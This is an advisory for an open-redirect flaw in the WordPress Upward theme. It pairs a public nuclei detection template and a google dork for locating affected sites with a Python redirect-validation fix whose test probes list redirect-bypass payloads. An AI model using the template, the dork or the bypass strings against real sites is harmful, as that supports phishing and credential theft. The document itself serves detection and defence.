WordPress Upward Themes 1.5 accepts user-controlled input that specifies a link to an external site and uses that link in a redirect, which simplifies phishing attacks. An HTTP parameter may carry a URL value and cause the web application to redirect the request to that URL. By changing the URL value to point at a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
PoC code [public]
id: wp-upward-theme-redirect

info:
  name: WordPress Upward Themes <1.5 - Open Redirect
  author: r3Y3r53
  severity: medium
  description: |
    WordPress Upward Themes 1.5 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. An http parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
  reference:
    - https://cxsecurity.com/issue/WLB-2020030133
  metadata:
    verified: true
    max-request: 1
    google-query: inurl:"/wp-content/themes/Upward/"
  tags: wordpress,wp-theme,wp,upward,redirect,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/themes/Upward/go.php?https://interact.sh"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 4b0a00483046022100c05492834087fd1cb08737c5f6072f275a33aba17eb2891226f2d3905312b97a022100a00c9f179b66bc48a3786e5d95a7b5eef5e881234abd8e2af3aa070cd16038ad:922c64590222798bb761d5b6d8e72950
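The template above proves the defect by watching for a Location header that lands on interact.sh. The fix on the application side is to validate the destination before emitting that header. The following is an added example, not the theme's go.php and not part of the nuclei template: a redirect-target check written in Python (rather than the theme's PHP) so the logic can be exercised directly. The allowlist hosts, the function names and the fallback to "/" are assumptions; it covers the bypass shapes the template's own regex tolerates (scheme-relative "//host", userinfo "@", backslash-as-slash) plus a few more.

```python
import re
from urllib.parse import urlsplit

# Destinations this site is allowed to send users to (constructed example allowlist).
ALLOWED_HOSTS = frozenset({"example.com", "www.example.com"})


def is_safe_redirect(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Return True only if `target` is a same-site relative path or an
    absolute http(s) URL whose host is on the allowlist."""
    if not target or re.search(r"[\x00-\x20\x7f]", target):
        # Empty, or contains control characters / whitespace. Rejecting CR and LF
        # also rules out response-header injection; tabs are stripped silently by
        # browser URL parsers, so "/<TAB>/evil.example" would become "//evil.example".
        return False
    # Browsers treat "\" as "/" in the authority, so "/\evil.example" means "//evil.example".
    candidate = target.replace("\\", "/")
    parts = urlsplit(candidate)
    if not parts.scheme and not parts.netloc:
        # Relative reference. A path beginning with "//" (or "///") is scheme-relative
        # and resolves to another host, so require exactly one leading "/".
        return candidate.startswith("/") and not candidate.startswith("//")
    if parts.scheme not in ("http", "https"):
        return False  # javascript:, data:, mailto:, etc.
    host = parts.hostname  # lower-cased, with userinfo ("user@") and port removed
    if not host:
        return False  # "https:evil.example" parses with an empty netloc; browsers would still follow it
    return host in allowed_hosts


def redirect_target(query_string: str, fallback: str = "/") -> str:
    """Choose the Location value for a go.php-style handler that takes the whole
    query string as the destination (the pattern used in the PoC above).
    Unsafe targets fall back to the site root instead of being passed through."""
    return query_string if is_safe_redirect(query_string) else fallback


if __name__ == "__main__":
    # Constructed inputs: the PoC payload and a few variants, beside legitimate ones.
    for probe in ("https://interact.sh", "//interact.sh", "/\\interact.sh",
                  "https://example.com@interact.sh", "https:interact.sh",
                  "/wp-admin/", "https://www.example.com/account"):
        print(f"{probe!r:45} -> Location: {redirect_target(probe)}")
```

Matching on the parsed hostname (not on a substring of the raw string) is what defeats "https://example.com@interact.sh" and "https://example.com.interact.sh"; a prefix check such as `startswith("https://example.com")` would pass both.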